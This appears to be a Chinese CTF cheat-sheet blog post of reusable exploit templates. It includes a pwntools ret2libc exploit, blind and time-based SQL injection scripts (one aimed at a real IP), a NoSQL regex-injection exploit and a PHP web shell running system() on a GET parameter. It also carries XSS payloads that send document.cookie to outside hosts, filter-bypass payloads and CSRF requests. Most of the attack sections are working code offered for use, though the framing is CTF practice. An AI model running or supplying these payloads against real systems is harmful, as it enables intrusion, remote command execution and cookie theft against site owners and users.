EXP all in one(置顶)

First you hate ‘em, then you get used to ‘em. Enough time passes, gets so you depend on them. That’s institutionalized.

1
2
3
4
5
6
7
8
9
10
docker run -d \
--rm \
-h ${ctf_name} \
--name ${ctf_name} \
-v $(pwd)/${ctf_name}:/ctf/work \
-p 23946:23946 \
--cap-add=SYS_PTRACE \
skysider/pwndocker

docker exec -it ${ctf_name} /bin/bash

记录一些 exp 常用模版

PWN

Shellcodes 数据库

Glibc 源码查看

shellcode

在 scanf 函数的情况下

1
2
\x09, \x0a, \x0b, \x0c, \x0d, \x20 都无法读取
可以使用 0x08 再 inc eax 平替

ret2libc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
from pwn import *
import time

context.terminal=["tmux","sp","-h"]
context(log_level='debug')

DEBUG = 0
LOCAL = True
BIN = './level3_x64'
HOST = 'node3.buuoj.cn'
PORT = 27939

def exploit(sh):
libc = ELF('./libc-2.19.so')
sys_lib_addr = libc.symbols['system']
write_lib_addr = libc.symbols['write']
bin_lib_addr = libc.search('/bin/sh').next()
#eli0t
write_plt = elf.symbols['write']
write_got = elf.got['write']
vulner_addr = elf.symbols['vulnerable_function']
rdi = 0x4006b3
rsi = 0x4006b1
payload = 0x80*'a' + 0x8*'b' + p64(rdi) + p64(0x1) + p64(rsi) + p64(write_got) + p64(0x1) + p64(write_plt) + p64(vulner_addr)
# []high
# []vulner_addr
# []write_plt
# []0x1
# []write_got
# []rsi
# []0x1
# []rdi
# []…140
# []low
sh.recvuntil('Input:\n')
sh.sendline(payload)
write_true = u64(sh.recv(8))
sys_true = write_true - write_lib_addr + sys_lib_addr
bin_true = write_true - write_lib_addr + bin_lib_addr # here
payload_2 = 0x80*'a' + 0x8*'b' + p64(rdi) + p64(bin_true) + p64(sys_true) + p64(0x1)
sh.recvuntil('Input:\n')
sh.sendline(payload_2)
sh.interactive()
return

if __name__ == '__main__':
elf = ELF(BIN)
if len(sys.argv) > 1:
LOCAL = False
sh = remote(HOST,PORT)
exploit(sh)
else:
LOCAL = True
sh = process(BIN)
log.info('PID: ' + str(proc.pidof(sh)[0]))
# pause
if DEBUG:
gdb.attach(sh)
exploit(sh)

IDA

  • BreakPoint (F2): 设置断点。 程序一到达该点就停止。
  • 重启(Ctrl + F2):停止调试。
  • 运行(F9): 继续运行程序或开始调试。
  • Step Into (F7) : 执行一行汇编代码。 如果是函数调用,则进入函数内部。
  • Step Over (F8) : 执行一行汇编代码。 它不会进入函数内部。
  • 快捷键 G 跳转到任何地址或标签。
  • 热键 N 重置函数和变量名称 对于未定义的函数和变量
  • 单击任何函数或变量并 快捷键 X 重新引用使用该函数或变量的区域
  • 单击任何函数或变量并 快捷键 Y 指定函数或变量的类型。 对于函数,您可以添加要传递的参数或更改其类型
  • 快捷键 Shift + F12 搜索二进制文件中使用的所有字符串。

Web

HTTP 方法

OPTIONS

OPTIONS 发送请求,在返回的请求头中可以看到允许的请求方式

image-20220521153932344

image-20220521154036683

JS

1
2
3
for(i=0; i<=10000; i++){
$('#jack-target').trigger("click")
}

控制台获取 cookie

image-20220329215657631

SQL

常用:

1
2
3
4

LIMIT 1, 1 # 偏移量,长度


NOT/AND/OR 执行顺序

NOT > AND > OR,如果where 后面有OR条件的话,则OR自动会把左右的查询条件分开。

布尔盲注

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import requests


url = "?id="
result = ""
for i in range(20,50):
low = 32
high =128
mid = (high+low)//2
while(low<high):
payload ="0^" + "(ascii(substr((select(flag)from(flag)),{0},1))>{1})".format(i,mid)
html = requests.get(url+payload)
print(low,high,mid,":")
print(url+payload)
if "YES" in html.text:
low = mid+1
else:
high = mid
mid = (high+low)//2
if(low ==32 or high==128):
break
result = result + chr(mid)
print(result)
print("flag: " ,result)

时间注入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
import string
import requests
str_con=string.ascii_letters+string.digits

url='http://123.206.87.240:8002/web15/'
sql_into="127.0.0.1'+(select case when (substr((select flag from flag)from {0} for 1))='{1}' then sleep(5) else 1 end) and '1'='1"
#sql_into="127.0.0.1'+(select case when (substr((select flag from flag)from {0} for 1))='{1}' then sleep(5) else 1 end) %23 "
#substr(‘abc’ from 1 for 1)等于substr('abc' from 1 for 1)
#select case when 表达式 then 表达式 else 表达式 end 等价于IF(表达式,TRUE,False)
flag=''
for i in range(1,35):
for j in str_con:
try:
headers={
'X-Forwarded-For':sql_into.format(str(i),j)
}
re=requests.get(url,headers=headers,timeout=3)
except requests.exceptions.ReadTimeout:
flag += j
print (flag)
break
print('the final flag is '+flag)

python sqlite3

双引号引起的非预期解:

image-20220504164033826

官方解释 ,请使用单引号作为查询语句

image-20220504164051950

NoSQL Injection

Mango

源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
// 漏洞
// 防止攻击而编写的函数 filter 很容易被正则表达式绕过
const BAN = ['admin', 'dh', 'admi'];
filter = function(data){
const dump = JSON.stringify(data).toLowerCase();
var flag = false;
BAN.forEach(function(word){
if(dump.indexOf(word)!=-1) flag = true;
});
return flag;
}


app.get('/login', function(req, res) {
if(filter(req.query)){
res.send('filter');
return;
}
const {uid, upw} = req.query;
db.collection('user').findOne({
'uid': uid,
'upw': upw,
}, function(err, result){
if (err){
res.send('err');
}else if(result){
res.send(result['uid']);
}else{
res.send('undefined');
}
})
});

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
import requests, string


# 32位
flag = ""
urlHeader = "http://host1.dreamhack.games:11358/login?uid[$regex]=ad.in&upw[$regex]=^.{2}{"
listI = string.ascii_letters + string.digits + string.punctuation


for _ in range(32):
for i in listI:
url = urlHeader + flag + i + ".*}$"
print(url)
response = requests.get(url).text
if response == "admin":
flag = flag + i
print(flag)
break
flag = f"DH{{flag}}"
print(flag)

# DH{89e50fa6fafe2604e33c0ba05843d3df}

命令注入

因为不能回车,所以例子格式有点不对

元字符 解释 例子
`` **命令替换 **````它被替换为执行内部命令的结果。 $ echo echo theoritheori
$() **命令替换 **$()它被替换为执行内部命令的结果。 此字符的复制方式与上述不同。 ( echo $(echo $(echo theori))) $ echo $(echo theori)theori
&& **连续执行命令 **当您想在一行上使用多个命令时使用此选项。 如果前面的命令没有出错,则执行下面的命令。 (逻辑与) $ echo hello && echo theorihellotheori
` `
; **命令分隔符 **当您想在一行上使用多个命令时使用此选项。 ;用于简单区分命令,不管上一个命令是否有错误,都执行下一个命令。 $ echo hello ; echo theorihellotheori
` ` 管道 上一个命令的结果进入下一个命令的输入。

php木马

https://gist.github.com/joswr1ght/22f40787de19d80d110b37fb79ac3985

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
</html>

爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
import requests
qwe=open("1.txt","w")
name=['web','website','backup','back','www','wwwroot','temp']
suffix=['tar','tar.gz','zip','rar']
for i in name:
for j in suffix:
url="http://challenge-049c6ebba1992bc1.sandbox.ctfhub.com:10080/%s.%s" % (i,j)
web=requests.get(url)
qwe.write(web.text)
if web.status_code==200:
print("warn!The flag is in %s" % url)
print(requests.get(url).text)

正则匹配

菜鸟正则

1
2
3
4
5
6
7
8
9
10
import re
source='dskfjnvsijefhg1231342341234+123124234-12423524352345*43563743652637+134256453764534-1345643q2sdafewrq34egfrq3wef;fl[splv]'
expression = re.search(r"([\d+[+\-\*])+\d+", source).group()
#正则匹配想要的表达式
print(expression)
print(eval(expression))
'''
result = eval(expression)#计算正则匹配的内容
print(result,type(result))
'''

XSS

仅基于某些字符串进行过滤,则必产生 XSS;出于安全原因,XSS 过滤应该是保守的(允许列表过滤),只允许已知安全的标记

image-20220329220359939

1
new Image().src = "http:/bore.pub:37501/?cookie=" + document.cookie;
1
2
3
4
<script>location.href = "/memo?memo=" + document.cookie;</script>
<script>location.href = "http://RANDOMHOST.request.dreamhack.games/?memo=" + document.cookie;</script>
<img src="/error" onerror="alert(document.cookie)">
<a onmouseover="alert(document.cookie)">xxs link</a>

绕过

1
2
3
4
5
6
7
8
9
10
11
12
13
x => !/<script[^>]*>[^<]/i.test(x)
<script src="data:,alert(document.cookie)"></script>

x => !/<img.*on/i.test(x
<img src=""\nonerror="alert(document.cookie)"/>

x => !/<script|<img|<input/i.test(x)
<video><source onerror="alert(document.domain)"/></video>
<body onload="alert(document.domain)"/>

x => !/<script|<img|<input|<.*on/is.test(x)
<iframe src="javascript:alert(parent.document.domain)">
<iframe srcdoc="<&#x69;mg src=1 &#x6f;nerror=alert(parent.document.domain)>">

CSRF

1
2
3
<img src="/sendmoney?to=dreamhack&amount=1337">
<img src=1 onerror="fetch('/sendmoney?to=dreamhack&amount=1337');">
<link rel="stylesheet" href="/sendmoney?to=dreamhack&amount=1337">

网络

image-20220421004239689

Misc

流量审计(盲注流量)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
# -*- coding: utf-8 -*-
import re


flag = ''
for i in range(1,40):
f = open('test4.txt','r')
line = f.readline()
tmp = 0
while line:
data = re.search(str(i)+',1\)\)>(.+?)(.+?)(.+?)', line)
if data:
print data.group()
try:
str1 = int(data.group()[-3:])
print str1
if str1 >= tmp:
tmp = str1 + 1
except:
pass
line = f.readline()
else:
line = f.readline()
flag = flag + chr(tmp)

f.close()
print (flag)

'''
SELECT * from news where id =1 AND
ORD(
MID(
(SELECT IFNULL(
CAST(flag_here AS CHAR),0x20
) FROM sqltest.flag ORDER BY flag_here LIMIT 0,1)
,1,1)
)
>112
'''

# https://blog.csdn.net/qq_40519543/article/details/107135902

base64 to str

1
2
3
4
5
6
7
8
9
10
11
import base64
base = open("base.txt", "r")
resu = open("resu.txt", "a")
line = base.readline()
while line:
resu_line = base64.b64decode(line)
resu_line = resu_line.decode()
resu.write(resu_line)
line = base.readline()
base.close()
resu.close()

Snippet

bash

Link:https://learn.dreamhack.io/187#4

1
2
3
4
5
6
7
$() # 里面执行终端指令
`` # 同上
;
&&
||
|
cat flag.py|tr -d '\n' # 删除空格

python

1
2
3
4
5
6
7
8
9
10
11
12
13
a.strip("\n")

import json
json.loads(str)

import string
string.ascii_letters
string.digits
string.punctuation

# 进度条
from tqdm import tqdm
for port in tqdm(range(1500, 1801))

爬虫

multipart/form-data 请求

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from urllib3 import encode_multipart_formdata

url = "https://yun.szlib.org.cn/electroomapi/elecroom/ermonitor"


params = {
'servaddr':(None, 'Sxxxxxxxxxxxx'),
'authkey':(None, 'e7cfxxxxxxxxxxxxx'),
'mode':(None, 'write'),
'lognum':(None, '6'),
'timesup':(None, '10')
}
m = encode_multipart_formdata(params, boundary='----WebKitFormBoundaryBd19XOf1FdDuOLWb')
print(m)

截屏2022-04-17 22.03.18

水晶头口诀

橙白全橙绿白蓝,蓝白全绿棕白棕

Windows samba 客户端

图片1

异或与非

123